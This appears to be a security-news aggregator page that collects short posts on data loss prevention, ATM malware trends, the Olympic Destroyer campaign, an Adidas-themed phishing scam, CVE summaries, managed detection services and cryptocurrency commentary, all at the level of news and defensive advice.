Blog | Avast EN: Managed Workplace patch changes the patching game | Avast Business

As the world’s largest corporate enterprises expand ever-larger, absorbing acquisition after acquisition, the SMB (small to medium-sized business) finds itself working harder than ever to keep a foothold in the marketplace. It leans heavily on its MSP (managed service provider) to keep all things tech running smoothly day in and day out.



Blog | Avast EN

McAfee Blogs: How One Healthcare Company Implements DLP to Protect PII and PHI

In 2016, Prime Therapeutics, an American pharmacy benefits management company, hired Jacob Walls to bolster data loss prevention across the enterprise. The company serves 22 Blue Cross Blue Shield health care plans and more than 27 million members nationwide, including one out of every six people covered through US public healthcare exchanges. Since Prime Therapeutics’ employees and systems handle both PII and PHI daily as they interact with Blue Cross Blue Shield, pharmacists, Medicare and Medicaid, and employers, a robust DLP defense is essential.

Defining and Implementing DLP Use Cases Throughout the Enterprise

In his role as a senior information security engineer and Prime Therapeutics’ main DLP expert, Walls and his team spend a lot of time engaging with other departments outside of security. First, they work to understand the stakeholders’ DLP-related concerns and define specific use cases to meet their various privacy, compliance, legal, or incident response-related requirements. Then they create rules for the company’s McAfee Network DLP appliance[s] and McAfee DLP Endpoint agents to test and implement.

“Different departments come to us and request the services for a specific use case,” explains Walls. “We’ll usually provide them with metrics around how well a rule set can address their use case… go over false positive rates and things like that to give them a baseline of how effective [DLP] would be.” Then, after implementing the policy, Walls or another engineer will meet regularly with the requestor of the policy to provide feedback on its effectiveness and, as necessary, tweak for improvements.

For instance, the company’s Privacy and Data Distribution department was concerned that users could print sensitive information on unauthorized printers. Using the built-in local printing rules in the McAfee Network DLP appliance, Walls easily addressed the issue, enforcing the printing of sensitive information only to authorized printers. In addition, discussions on effectiveness led to reporting that filters printing by user and content to pinpoint any employees who need additional education or monitoring.

Preventing Sensitive Data Leakage Via Email

Since email is the primary form of communication with entities outside the network, for many specific departments and the enterprise in general, preventing exfiltration of sensitive information via email message or attachment is one of Prime Therapeutics’ most important DLP use cases. This use case was also the main reason for purchasing McAfee Network DLP.

“Using McAfee Data Loss Prevention, we have implemented corporate policies that restrict sensitive information from exiting the network via email unless authorized and encrypted,” notes Walls. “Moving this functionality from the MTA [Mail Transport Agent] to DLP has allowed for true security ownership and has greatly enhanced our capabilities in this area. Additionally, reporting and metrics around the use of email for communicating sensitive information has helped us internally to gauge the level of risk associated with this communication method…The visibility we now have into outbound email communication has been extremely beneficial on multiple fronts.”

Effectiveness and speed are driving indicators of success… The visibility McAfee DLP has given us into both our data at rest and our data in motion has had both an immediate and ongoing positive impact on our business.”

—Jacob Walls, Senior Security Engineer, Prime Therapeutics

How Successful are These DLP Implementations?

“Effectiveness and speed are driving indicators of success,” says Walls, pointing to lack of data leakage incidents and ease of compliance as components of those two indicators. “The visibility McAfee DLP has given us into both our data at rest and our data in motion has had both an immediate and ongoing positive impact on our business.”

A side-benefit of implementing McAfee DLP Endpoint and McAfee Network DLP for Prime Therapeutic has been an increase in awareness across its employee base regarding sensitive data. “Awareness around data-at-rest and the need to place controls around approved locations appears to be growing,” states Walls. “[It] is not limited to specific departments, but rather arises from projects and conversations between all the teams involved. It’s a positive maturing of controls due to greater business awareness of DLP.”

Advice to Those Looking to Implement DLP Solutions

Based on his experience, Walls says he would advise anyone looking at DLP solutions to begin by identifying and prioritizing use cases. “Much of the work around DLP happens outside of the tool and is process-driven,” he elaborates. “Therefore, it’s important to engage with the stakeholders and affected parties even prior to any rule configuration. That said, make sure you know what the DLP solution is capable of, and what it offers for integration and workflow. Doing so up front will save a lot of time and help avoid miscommunication and misaligned expectations.”

Walls also offers words of encouragement. He really enjoys his job, and especially interacting with other areas of the business. “I get great satisfaction in solving a problem and sharing that with the people I’ve solved the problem for,” he claims.

Working with DLP has also shifted Wall’s priorities and expanded his viewpoint. “DLP definitely branches out to other departments and gets you engaged with privacy, with legal—really with your core business,” he says. “I’ve been able to sympathize a little more [and understand better] the desired end results of other departments outside of security. So that’s been helpful.”

“Security is not a one-person job; it can’t be accomplished with one person [or] one company,” concludes Wall. “So we need partners, and we need friends in the industry to work together. The McAfee support team has consistently available, receptive, and responsive to our questions and needs. ‘Together is Power’ is definitely something that McAfee represents for us.”

To watch a video of Jacob Walls talking about his experience with McAfee and information security, watch below. Get your questions answered by tweeting @McAfee_Business.

The post How One Healthcare Company Implements DLP to Protect PII and PHI appeared first on McAfee Blogs.



McAfee Blogs

Search Msdn: Desired State Configuration (DSC) Planning Update …

In September 2017 we communicated some of our plans for PowerShell Desired State Configuration (DSC). Over the past few months, we have been executing on these plans and collecting feedback from customers and partners. The intent of this blog is to provide an update on the plans we shared back in ...

Search Msdn

Search Msdn: What Happened to Bower? | ASP.NET Blog

Bower is a popular package management system for managing static content used by client-side web applications. Visual Studio provides rich support for Bower, including templates and package management tools. Though it doesn’t say it explicitly, it implies that Bower is deprecated. Existing ...

Search Msdn

Search Msdn: Community – MSDN Blogs

MSDN Blogs MSDN Blogs Get the latest information, insights, announcements, and news from Microsoft experts and developers in the MSDN blogs. Tag: Community Check ...

Search Msdn

Search Msdn: Announcing Entity Framework Core 2.1 Preview 2 | .NET Blog

Today we’re releasing the second preview of EF Core 2.1, alongside .NET Core 2.1 Preview 2 and ASP.NET Core 2.1 Preview 2. Thank you so much to everyone who has tried our early builds and has helped shape this release with their feedback and code contributions! For a more complete description of ...

Search Msdn

Search Msdn: Entity Framework Core 2.1 Roadmap | .NET Blog

As mentioned in the announcement of the .NET Core 2.1 roadmap earlier today, at this point we know the overall shape of our next release and we have decided on a general schedule for it. As we approach the release of our first preview later this month, we also wanted to expand on what we have ...

Search Msdn

Search Msdn: Entity Framework 6.2 Runtime Released | .NET Blog

Today we announce the availability of EF 6.2 runtime in NuGet.org. Entity Framework (EF) is Microsoft’s traditional object/relational mapper (O/RM) for .NET Framework. To understand the difference between EF6 and EF Core, please refer to our documentation. You can install EF 6.2 either using the ...

Search Msdn

Search Msdn: MSDN Blogs

Get the latest information, insights, announcements, and news from Microsoft experts and developers in the MSDN blogs.

Search Msdn

IDG Contributor Network: The costs, the privacy and the security of IAM and personal data sharing

The concept of some component (usually software) that manages your personal data is not new. The idea is often associated with Doc Searls, who developed ProjectVRM, which advocates that customers take control of their data in the form of “Vendor Relationship Management” tools.

In my dealings in the consumer IAM space, I’ve become increasingly aware that digital identity and its applications, needs to be opened up – to do “jobs.” That is, the identity that says, I am who I say I am is more of a conduit to transfer data between me and some entity I want something from, than a statement of my digital self. Our digital lives are now so much more than using login credentials; equating Facebook with a digital identity now seems naive. Instead, services that allow us to perform dynamic identity-based transactions are setting the stage for a new era in personal data.

To read this article in full, please click here

Evasive new botnet can take over enterprise devices to steal data, spread ransomware

A new, extremely evasive botnet has been discovered that takes unique leverage of command and control servers and can completely take over an enterprise device to execute any type of code it wishes, from ransomware to trojans to data extraction, according to researchers at endpoint and mobile security firm Deep Instinct. The malware–which is...

Read the whole entry... »

Related Stories

Three Reasons BIS Crypto Rebuke Is B.S.

What a difference a week makes. Traders in recent days have found more reasons to celebrate cryptocurrencies than to fear them, despite the best efforts of central bankers. The combined market cap of the cryptocurrency market is hovering at more than $293 billion, top digital currencies are trading in a sea of green and investors […]

The post Three Reasons BIS Crypto Rebuke Is B.S. appeared first on Hacked: Hacking Finance.

Pre-Market: Stocks Extend Losses on Next Round of US Tariffs

The main European and Asian indices and US stock futures are all significantly lower just before the Wall Street session, as Donald Trump announced that the administration will seek to extend the trade tariffs targeted at China. The extension would affect another $200 billion of products, and it would be a major escalation of the, […]

The post Pre-Market: Stocks Extend Losses on Next Round of US Tariffs appeared first on Hacked: Hacking Finance.

Hackers Who Hit Winter Olympics 2018 Are Still Alive and Kicking

Remember the 'Olympic Destroyer' cyber attack? The group behind it is still alive, kicking and has now been found targeting biological and chemical threat prevention laboratories in Europe and Ukraine, and a few financial organisation in Russia. Earlier this year, an unknown group of notorious hackers targeted Winter Olympic Games 2018, held in South Korea, using a destructive malware that

PageUp: No Sign of Data Exfiltration

But Old Error Logs Contained Clear Text of Incorrect Passwords
Human resources software developer PageUp says it doesn't appear that personal data exposed in a malware attack was actually removed from its systems. But it has also found authentication error logs that recorded incorrect login attempts from before 2007.

ATM Hacking: You Don’t Have to Pay to Play

US Banks are getting Skin in the Game

How many times have you used an Automated Teller Machine (ATM) in your life? Probably too many times to count, and for some people it’s on a daily basis. Although not usually at the forefront of cyber headlines, ATM hacking has been on the uptick over the past few years and is reportedly to be a $2 billion global problem.

ATM hacking targets both financial institutions and individuals, depending on the type of attack. Reported losses to financial institutions since 2014 are in the millions of dollars. And of course the cost of absorption of these losses has a trickle-down effect to all banking customers.

Typically observed in Europe and South/Central Americas, incidents are increasingly being reported in the US. According to the European ATM Crime Report, ATM logical and malware attacks rose 287% from 2015 to 2016. In January of this year, the US Secret Service alerted banks that ATM attacks were being seen in the US, with losses reported to be as high as $1,000,000 over a few incidents.  Similarly, two major ATM manufacturers, Diebold Nixdorf Inc. and NCR Corp warned customers of the outbreak of ATM attacks in the US.

Snippet from USSS Press Release Regard ATM Hacking

 

The color of money – not all attack types are the same

There are two primary types of ATM attacks: physical and logical. In a physical attack, the threat actor must be present at the ATM, either before, during, and/or after the attack. It’s reported that physical attacks increased by 12% from 2015 to 2016, and the volume of these types of attacks is much higher than logical attacks.

Types of physical attacks include the following:

  • Skimmers: a device is connected over the card slot of an ATM, which “skims” card information from the customer card upon insertion. Skimmer devices are easily purchased, and possessing one is not necessarily illegal. In Virginia, for example, state code only specifies illegality for possession if malicious intent can be proven.

Skimmer Device Available for Purchase

  • Theft: the ATM is literally hauled away to be broken into at a more convenient time and location. Just this week in Wichita, Kansas, thieves towed an ATM out of a bingo casino, loaded it into the back of a pickup truck and, drove off.
  • Destruction: admittedly a much less sophisticated method, in this scenario attackers destroy the ATM in an attempt to access the cash. Observed techniques have included explosives, torches, “jaws of life” cutters, hammers, and more.

ATM Destructive Physical Attack, Ireland, 2014 (image courtesy of bbc.com)

Logical attacks, or malware-based attacks, don’t necessarily preclude physical access. Physical access may be required to inject the malware and/or to operate a keyboard to run commands. Alternatively, attacks can leverage phishing emails to gain access to administrative credentials. In the case of remote or network-based ATM attacks, the ATM is accessed by “mules” to withdraw the money, typically using a one-time-use PIN or some other control to prevent them from taking money for themselves.

Skimer was the first known ATM malware, and requires manual installation via CD-ROM.  Skimer specifically targets Diebold ATMs.  First observed in 2009, Skimer is still found in the wild, with samples in VirusTotal collected as recently as May 2018.

Ripper was the was the first ATM malware observed to target multiple ATM vendor machines and features use of an ATM card embedded with a malicious Europay, Mastercard, and Visa (EMV) chip that activates the malware. Ripper was notoriously used in a number of ATM attacks in Thailand in 2016.

Other ATM-specific malware requiring physical access for installation includes Ploutus, Padpin-Tyupkin, GreenDispenser, and Alice.

The LookingGlass Cyber research team recently did a deep-dive on a relative newcomer to the ATM hacking scene, Cutlet Maker malware. Cutlet Maker is installed and launched via USB connection.  This minimally invasive and relatively easy-to-accomplish technique is often referred to as ATM “jackpotting” or a “black box” attack.  A full report with details of our analysis is available to STRATISS customers.

Screenshot of Cutlet Maker ATM Malware

ATMitch is a network-based ATM malware that uses Remote Desktop Connection (RDP) from inside a bank’s network to install and execute commands.  This network-based malware is typically distributed via a phishing email sent to a bank employee.

Prilex ATM malware targets bank customers by stealing their card information and PIN. It is different from other malware in that it involves a Command & Control (C2) server, to which the credential are sent.

Show me the money – how ATM malware is distributed

ATM malware is often distributed via DarkNet forums. LookingGlass Cyber researchers have found numerous examples of the sale of various types of ATM malware, as seen in the following images:

Alice ATM Malware Advertised on exploit.in Forum

 

Cutlet-Maker ATM Malware Advertised on WSM Forum

The odds are stacked against the financial world

Contributing to the growth of ATM malware usage is the plethora of ATMs running outdated or even obsolete operating systems. While precise figures are not widely available, a CNN report from 2014 indicated that 95% of all ATMs were running Windows XP. Updating and/or upgrading the operating system of an ATM can be an expensive and laborious process, since each machine often has to be physically visited to either update the software or completely replace the hardware. A banking advisory company noted that overhauling a fleet of ATMs with new hardware or software is expensive, and banks are less likely to get a boost from marketing new features unless they are among the first to do so. Updates done solely to enhance security, without any anticipated marketing benefit, is unlikely to be appealing to ATM providers due to the cost; according to an FAQ sheet from the ATM Industry Association (ATMIA), as of 2014 there were over 3 million ATMs deployed globally.

Also complicating the issue of protecting ATM devices is the amount of information about them that is available. From manufacturers that provide descriptive marketing videos and user manuals to after-market vendors selling parts and refurbished machines, there is much that hackers can learn about how the machines operate, further aiding their efforts to successfully breach ATMs.

Further compounding the problem, ATM machines use a common specification, the XFS Interface promulgated by the European Committee for Standardization.  This openly available document provides detailed specifications for how ATMs are operated.

 

Leveling the odds in your favor

An ATM hack can have lasting effects on an organization. Not only are you liable for loss of money, but the biggest impact will likely be to your brand and reputation. Doug Hevner, of SunTrust Bank, had the following to say about skimming attacks: “So, it’s out there, it’s continuous, and if you haven’t seen it you’re going to see it. And it’s just a question of how do you prepare for that.”

The best way to protect your organization is to educate your employees on what to look for when at an ATM that could become a security risk.

There are a few ways to recognize if an ATM is breached, specifically if it’s been compromised by a skimmer device. The first is by tugging on the ATM to ensure that there is not a malicious overlay installed. We also suggest using ATMs that are located at banks, versus those that can be found in convenience stores, hotels, and other non-financial institutions. Increased surveillance and physical security methods at ATMs may also reduce the risk of attacks. Threat actors are less likely to target a well-lit, heavily-monitored ATM.

As we see ATM attacks increase in the US, financial institutions may find that the exposure to loss outweighs the cost of upgrades and it might be time to replace outdated software and hardware. Another option is looking into technology with the ability to mask vulnerabilities, allowing you time to upgrade outdated systems without compromising security.

The LookingGlass Cyber research team believes that ATM malware attacks will continue to grow in prevalence and popularity and that new malware will be developed. The lure of easy money is always strong. Until the banking industry takes serious steps to improve the security of ATMs, the problem will continue to increase. Outdated software and physically accessible hardware are primary contributors that organizations need to address if they want to avoid the monetary and reputation impacts of this attack vector.

So what do you do if one of your employee’s cards are breached by ATM malware?  Using our monitoring and look-up services you can proactively combat any potential fraud, ensuring the security of your organization and your employees.

Interested in more research like this? Learn more about our STRATISS digital library, where you can learn about cyber trends in your industry, specific threat actors, cyber attack vectors, and more.

 

The post ATM Hacking: You Don’t Have to Pay to Play appeared first on LookingGlass Cyber Solutions Inc..

Ex-CIA Employee Charged In Major Leak of Agency Hacking Tools

schwit1 shares a report from The Washington Post: Federal prosecutors on Monday charged a former CIA employee with violations of the Espionage Act (Warning: source may be paywalled; alternative source) and related crimes in connection with the leak last year of a collection of hacking tools that the agency used for spy operations overseas. Joshua Adam Schulte, who worked for a CIA group that designs computer code to spy on foreign adversaries, was charged in a 13-count superseding indictment with illegally gathering and transmitting national defense information and other related counts in connection with what is considered to be one of the most significant leaks in CIA history. The indictment accused Schulte of causing sensitive information to be transmitted to an organization, which is not named in the indictment but is thought to be WikiLeaks.

Read more of this story at Slashdot.

Trade Recommendation: district0x

Our April 14, 2018 trade recommendation for the district0x/Bitcoin (DNT/BTC) pair hit the target on April 22 when it went as high as 0.00002304. Those who followed the trade recommendation grew their investments by at least 50% in about a week. The trade recommendation also emphasized to sell immediately once the target is hit. It […]

The post Trade Recommendation: district0x appeared first on Hacked: Hacking Finance.

CVE-2018-1073

The web console login form in ovirt-engine before version 4.2.3 returned different errors for non-existent users and invalid passwords, allowing an attacker to discover the names of valid user accounts.

CVE-2018-1061

python before versions 2.7.15, 3.4.9, 3.5.6 and 3.7.0 is vulnerable to catastrophic backtracking in the difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.

Why Community Is a Lifeline for Cybersecurity Experts

Think about your day-to-day job as one of the many cybersecurity experts working in the industry today: Do you often find yourself frantically typing queries into search engines? Do you struggle to get ahead of problems because you’re scrambling just to keep up? Do you feel like your skills are behind? Does it feel like your company’s approach to security is built upon fighting fires?

If you answered “yes” to any of these questions, you’re not alone. The security landscape is too dynamic to lend itself to hard rules and fixed practices. It’s not a discipline for the weary — it takes grit, time, dedication and tenacity to be successful. To be an effective security professional, we must be innovative and ready for the unexpected. (But this is why you like cybersecurity, right?)

The good news: You’re in good company.

The Cybersecurity Community: No Right or Wrong Answers

I recently returned from a whirlwind tour where I had the opportunity to ask cybersecurity experts around the world about how they do their jobs and their definitions of success. I attended the May 2018 IBM Security Master Skills University event in Orlando, Florida, as well as the recent IAM European User Group meetings in Germany, Sweden, France and Italy. My mission was to tell our clients, partners and colleagues about our new security user group community. During my tour, I also learned that no two organizations approach cybersecurity in the same way.

Take the skills crisis, which is global in scope and affects every organization. I asked cybersecurity experts how their organizations are dealing with the shortfall. I got many answers, including:

  • “Word of mouth with colleagues.”
  • “It’s up to me, so I study on my own time.”
  • “My country doesn’t have a good base of security skills in general.”
  • “Conferences and outside classes.”
  • “Internal training.”
  • “Company Wiki.”
  • “Job shadowing and mentoring.”
  • And my personal favorite: “It’s sink or swim.”

New Collar Dynamics

When I asked cybersecurity experts about how they got into the field in the first place, the answers were just as diverse:

  • “Studied it in university.”
  • “On-the-job training.”
  • “Implementing cryptography on OS/2.”
  • “It was by accident. I started as a software developer.”
  • “A friend dragged me into it because he thought I’d be good at this.”

I can’t help but imagine the contrast between these answers and those I might get if I interviewed a group of accountants or manufacturing engineers. Those established professions have well-defined skills requirements, rich university programs, time-tested certifications and clear job descriptions. Career paths are paved and well-trodden.

In contrast, cybersecurity is what IBM calls a “new collar” job. There are many career paths, low barriers to entry and almost boundless growth opportunity. The flip side of such an exciting career is uncertainty — and often poor direction from the top.

“We suffer from hourglass syndrome: The technicians constantly have sand pouring on them, and, as you go up the hourglass, the lines of communication shrink,” one client told me.

Many cybersecurity experts told me that it’s up to them to find their own opportunities and define their jobs. If you’re the type of person who enjoys getting up each morning not being entirely sure what you’re going to do that day, then I can’t imagine a more exciting career.

Connect With the Cybersecurity Community

The online landscape for security professionals is vast. Change is constant, and new challenges are always just around the corner. Human connection is essential in such an environment, which is why we launched the IBM Security Community. It enables security professionals to connect with each other to problem-solve, share learnings and tips — and even provide emotional support.

This community helps security professionals find local user groups and events; interact with other professionals and IBM experts; utilize education and training resources; and access top technical content from Master Skills University and presentations from recent user group meetings. (Some of the discussion forums already have hundreds of members — and we’re still only a few months into the program.)

My vision for the IBM Security Community is to give clients and partners a trusted resource to help them face the business challenges of today and impact the business outcomes of tomorrow. We will do this together, as isolation isn’t an option in the face of today’s advanced threats.

During my tour, I could see people in the audience visibly relax as I queried audiences about how they do their jobs. It became clear that their chosen profession had few right or wrong answers and that each professional could help the others. Join us, ask one question and answer another. Take our survey and tell us what you want from the community — we are listening.

The post Why Community Is a Lifeline for Cybersecurity Experts appeared first on Security Intelligence.

Can Your Managed Detection and Response Service Do This?

Submitted by Steve Duncan

Trend Micro introduced its Managed Detection and Response service to North America. I had the chance to catch up with Jon Oltsik of ESG again to discuss what we are offering and why we think the time is right.

As attackers become more sophisticated, enterprises must turn to more advanced detection and response capabilities to respond to them. Sometimes an effective detection strategy is to correlate threats from the network, server and endpoints to understand a complete picture of a targeted attack.

Unfortunately due to a cybersecurity skills shortage and a lack of staffing, enterprises struggle to correlate the many alerts and data themselves.

Trend Micro’s Managed Detection and Response provides managed advanced threat hunting on behalf of Trend customers. Customers deploy a unified Trend Micro endpoint solution that includes the ability to record system level activities. The metadata of this recording is continuously sent to the Trend Micro service. Customers also deploy (or have deployed) a Deep Discovery Inspector appliance. This appliance records network-level activities and alerts and sends the metadata to the Trend Micro Managed Detection and Response service. MDR analysts from Trend use this data to build a clear picture of how an advanced threat came in, morphed, and spread. By correlating this information, the service may also identify Industrial IoT devices that may be affected by the attack.

The service provides onboarding support, 24/7 alert monitoring, alert prioritization and investigation, and threat hunting services. Trend Micro will monitor customers’ Deep Discovery and OfficeScan environments, review security events to help determine the root cause/entry point, enrich event alerts where possible using threat hunting and investigation. Additionally, the Trend analysts will coordinate needed corrective action with the customer along with recommend changes to align with best practices in prevention. When necessary, customers will work directly with Trend Micro Security Analysts online and via phone from the Trend Micro Security Operation Center.

While the service is being delivered from Trend it will be available from selected Trend partners in 2019. More information on the service can be found here.

The post Can Your Managed Detection and Response Service Do This? appeared first on .

ICO Analysis: Harmony

As of today, there are no blockchains in existence that can scale to the needs of 5G technology and the internet of things. According to this Huawei article, to meet the requirements of 5G you need 100 billion connections, 1 ms latency and 10 Gbps throughput. New startup, Harmony Protocol, aims to be the first […]

The post ICO Analysis: Harmony appeared first on Hacked: Hacking Finance.

Free Societies are at a Disadvantage in National Cybersecurity

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.

Adidas fans hit by phishing scam

Why users always fall for the lamest phishing scams is beyond comprehension, but hackers take advantage of this weakness and hide their scheming behind the usual fake prizes and too-good-to-be-true giveaways. This time, it was Adidas’ turn to feature in a major phishing scam that targeted users in specific regions.

A fake Adidas campaign promising free shoes instantly became popular through WhatsApp, and it’s not even the first time such a phishing scheme was used this year. To celebrate its 69th anniversary, the sports company was allegedly giving away 2,500 pairs of shoes to users who filled out a four-question survey.

All they had to do was click on a link to claim the prize and share it on WhatsApp with their contacts. The redirections were based on the IP address and targeted mobile devices in Norway, Sweden, Pakistan, Nigeria, Kenya, Macau, United States, Netherlands, Belgium and India.

No matter how many times users tried to share the campaign, they had no way to confirm that the share actually went through. It was just part of the scam. The very detail that they couldn’t choose color or size should have been a hint that it wasn’t a legitimate campaign – either that or the misspelled company name in the spoofed link.

Users were promised free sneakers in exchange for $1 to claim them, but all they were left with was a recurring $50-per-month subscription fee. Through the scam, hackers got access to users’ payments and contact details. The subscription users are automatically signed up for the “organizejobs” service, which has been identified as a scam.

Early detection of compromised credentials can greatly reduce impact of attacks

According to Blueliv’s credential detection data, since the start of 2018 there has been a 39% increase in the number of compromised credentials detected from Europe and Russia, compared to the same period in 2017 (January-May). In fact, Europe and Russia are now home to half of the world’s credential theft victims (49%). In this podcast, Patryk Pilat, Head of Engineering and Cyberthreat Intelligence at Blueliv, talks about the report, and illustrates how these startling … More

The post Early detection of compromised credentials can greatly reduce impact of attacks appeared first on Help Net Security.

MPs share concern over cyber threat to critical national infrastructure

New insight from global cyber security and risk mitigation expert, NCC Group, has revealed that two thirds of MPs consider the compromise of critical national infrastructure to be the biggest cyber security threat facing the UK.

 

A year on from the cyber attack on parliamentary emails, a YouGov survey commissioned by NCC Group has gauged the opinions of MPs in the House of Commons with regards to their personal cyber security, the cyber risks associated with national security and societal wellbeing, and the consequences of a successful attack on parliament. The results revealed that 62% of MPs across all regions, including 70% of Conservatives and 57% of Labour MPs, consider a compromise of critical national infrastructure to be the biggest risk.

 

Despite this common ground between MPs across parties on the threat to critical national infrastructure, the survey indicated divides with regards to the severity of other cyber threats. 42% of Conservatives said that they consider a compromise of nuclear capabilities to be one of the top two threats, compared to just 14% of Labour MPs, while 44% of Labour MPs considered democratic interference to be a significant threat, compared to 16% of Conservative MPs.

 

Alongside this, the survey highlighted that 75% of all MPs are concerned that a breach of their personal email could negatively affect the cyber security of the House of Commons, highlighting that most MPs understand the crucial role they personally play in enhancing the UK Parliament’s security posture.

 

It was also revealed that, in the event of a successful cyber attack, 73% of all MPs considered the breach of constituents’ privacy to be their biggest concern, alongside a leak of sensitive information relating to parliamentary business (46%).

 

These results have been released ahead of a meeting at the House of Commons today, which will address the cyber threats challenging the UK political landscape and outline how MPs can best contribute towards tackling this growing threat.

 

Ollie Whitehouse, global chief technical officer at NCC Group: “It’s very positive to see that a majority of MPs are aware of the different threats we face and realise the gravitas of a successful attack, particularly with regards to our resilience as a nation.

 

“In recent years, the government has been proactive in implementing initiatives to strengthen the UK’s stance against evolving technical and geopolitical threats which attempt to compromise the integrity of our nations. MPs play a significant role in these initiatives, so it’s important to maintain continued education around modern threats and informed dialogue amongst all stakeholders. This will ensure that parliamentary staff at all levels understand the steps they need to take, in both their professional and personal lives, in order to address cyber risk head on.”

The post MPs share concern over cyber threat to critical national infrastructure appeared first on IT SECURITY GURU.

Olympic Destroyer is back, targeting chemical, biological and nuclear threat protection entities in Europe

Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in Pyeongchang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organisations involved in protection against chemical and biological threats.

 

Olympic Destroyer is an advanced threat that hit organisers, suppliers and partners of the Winter Olympic Games 2018 in Pyeongchang, South Korea with a cybersabotage operation based on a destructive network worm.  Many indicators pointed in different directions for the origins of the attack, causing some confusion in the info-security industry in February 2018. A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and Lazarus was unlikely to be the source. Researchers have now found the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolset, and focusing on targets in Europe.

 

The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. One such decoy document referred to the ‘Spiez Convergence’, a bio-chemical threats conference held in Switzerland and organised by the Spiez Laboratory, an organisation that played a key role in the Salisbury attack investigation. Another document was targeting an entity of the health and veterinary control authority of Ukraine. Some of the spear-phishing documents uncovered by researchers carry words in Russian and German.

 

All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. An open-source and free framework, widely known as Powershell Empire, was used for the second stage of the attack.

 

The attackers appear to use compromised legitimate webservers to host and control the malware. These servers use a popular open-source content management system (CMS) called Joomla. The researchers found that one of the servers hosting the malicious payload used a version of Joomla (v1.7.3) released in November 2011, which suggests that a very outdated variant of the CMS could have been used by the attackers to hack the servers.

 

Based on Kaspersky Lab telemetry and files uploaded to multi-scanner services, the interests of this Olympic Destroyer campaign appear to have been entities in Germany, France, Switzerland, the Netherlands, Ukraine and Russia.

 

“The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever and showed how easy it is to make a mistake with only fragments of the picture that are visible to researchers. The analysis and deterrence of these threats should be based on cooperation between the private sector and governments across national borders. We hope that by sharing our findings publicly, incident responders and security researchers will be better placed to recognise and mitigate such an attack at any stage in the future.” said Vitaly Kamluk, security researcher in Kaspersky Lab’s GReAT team.

In the previous attack, during the Winter Olympic Games, the beginning of the reconnaissance stage was a couple of months before the epidemic of the self-modifying destructive network worm. It is highly possible that Olympic Destroyer is preparing a similar attack with new motives. That is why we advise biological and chemical threat research entities to stay on high alert and launch an out-of-schedule security audit where possible.

The post Olympic Destroyer is back, targeting chemical, biological and nuclear threat protection entities in Europe appeared first on IT SECURITY GURU.

Global IoT tech spending to reach $1.2 trillion in 2022

IDC forecasts IoT spending will experience a compound annual growth rate (CAGR) of 13.6% over the 2017-2022 forecast period and reach $1.2 trillion in 2022. The forecast is based on the latest research in the burgeoning IoT technology market, which offers business investment opportunities across a spectrum of industries and illuminated through use case implementations. As the diverse IoT market reaches broad-based critical mass, innovative offerings in analytics software, cloud technologies, and business and IT … More

The post Global IoT tech spending to reach $1.2 trillion in 2022 appeared first on Help Net Security.

CISO Chat – Allan Alford, CISO at Forcepoint

Ever wondered what the role of a Chief Information Security Officer (CISO) encompasses? To put it simply, they are the guardians and protectors of everything information security related to a business. However, the tasks are far from simple as their teams work around the clock to respond to incidences that directly affect the safety of the company and its data. As the issues in cyber have evolved, so too has the role of the CISO, which also involves consulting to boardroom level executives about the multitude of potential risks that threaten their business and being prepared for an eventual attack.

To get a better understanding on the life of a CISO, the IT Security Guru will chat to leading CISO’s to get their thoughts and ideas on the 2018 cyber landscape and will include advice, guidance & problems faced. We will leave the favourite food and hobby questions for another time.

On the back of what was a fantastic first round of questioning with insightful responses from leading figures in the IT security industry, the CISO Chat segment on the IT Security Guru has returned for the second round of questioning.

Allan Alford, CISO at Forcepoint was available next to give his expert opinion.

 

With the development of Blockchain technology, what industries do you think will benefit most from its introduction and why?

Blockchain is essentially a decentralised encryption schema with an eye towards encrypting an ever-growing data stream. This technology underpins the transaction ledgers used by most cryptocurrencies, but it’s not the only use of blockchains. Many people tend to confuse blockchains and digital currencies. That’s a mistake, as it’s a bit like confusing a cog with a watch: most watches contain cogs, but they are not the same thing.

With cryptocurrencies and other trust-based asset tracking systems based upon blockchain technology, I can see any industry requiring a foundational trust mechanism for digital transactions benefiting from the technology. Those introducing smart contracts, or transferred ownership of valuable assets – think legal contracts for property, or even jewel ownership – where trust in the authenticity of the transaction is critical – can use blockchain.

Blockchains provide a shared, immutable ledger that solves what we call the “double spending” problem. For example, with cryptocurrency without some protections there’s nothing to stop an attacker from copying a crypto-coin and spending it with you and also with someone else.

At the end of 2017 we made a prediction focused on cryptocurrencies, however our concern centered around the systems which support cryptocurrencies or other trusted transactions and the ways those systems could be manipulated for criminal gain.

